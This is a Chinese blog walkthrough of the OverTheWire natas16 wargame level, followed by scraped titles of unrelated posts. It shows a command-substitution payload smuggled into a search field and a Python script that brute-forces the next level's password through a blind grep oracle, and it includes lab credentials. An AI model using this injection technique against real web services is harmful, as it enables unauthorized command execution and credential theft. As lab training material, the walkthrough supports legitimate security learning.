natas16 题解
来源:互联网 发布:c语言 生成时间戳 编辑:程序博客网 时间:2024/06/07 17:12
本题与上一题相似(可看我上篇文章nata15 题解)
进入后发现和早前某关像,执行一个grep命令查找,这里的过滤字符中恰恰没包括 $ . * 这三个,可以利用$(grep -E ^8.* /etc/natas_webpasswd/natas17)hello 这样去输入
如果返回了hello和其他的字串,说明这里的grep没有执行,-E 是执行一个正则表达式,^8,* 这个表达式的意思是以8开头(这里就是上题的思路了),每次试出一个后附加上去然后继续试下一个,下一个加在原来的末尾,下面用python3实现,requests库比较好用,容易理解
import requests
url = "http://natas16.natas.labs.overthewire.org/"
username = "natas16"
password= 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
au = requests.auth.HTTPBasicAuth(username,password)
ans=""
testCharacter="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
i=0
while i < len(testCharacter):
#print(url1+key+url2)
payload={'needle':'$(grep -E ^'+ans+testCharacter[i]+'.* /etc/natas_webpass/natas17)hello','submit':'Search'}
req = requests.get(url,auth=au,params=payload)
if 'hello' not in req.text:
ans+=testCharacter[i]
print(ans)
i=0
continue
i+=1
- natas16 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解
- 题解~~~~
- 题解。。。。
- 题解
- 题解
- 1002 题解
- pku1001题解
- Centos配置国内yum源
- 高性能MySql进化论(四):Summary,Cache,Counter表的使用
- Jenkins简单使用介绍
- solr
- jquery ajax
- natas16 题解
- ECharts使用心得总结(二)
- greendao的扩展
- linux命令行常用命令
- recyclerview局部刷新闪烁
- 获取BIOS常规内存容量
- Qt中自己添加的ui界面和类,不能跳转的问题
- Android平台的音视频多媒体
- 指针实现整数排序